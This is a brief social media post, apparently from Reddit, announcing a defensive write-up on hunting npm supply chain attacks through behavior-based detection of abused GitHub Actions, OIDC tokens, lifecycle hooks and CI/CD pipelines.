Hunting the Behavior Behind npm Supply Chain Attacks
npm supply chain attacks are no longer “theoretical”.
TanStack. Axios. Trivy. Bitwarden. SAP. Intercom.
Attackers are abusing:
- GitHub Actions
- OIDC tokens
- npm lifecycle hooks
- trusted CI/CD pipelines
We built an AI-assisted hunting pipeline to detect the behavioral kill chain behind these attacks instead of chasing IOC crumbs.
Real queries. Real telemetry pitfalls. Real lessons learned.
u/shantanu14g — 8 days ago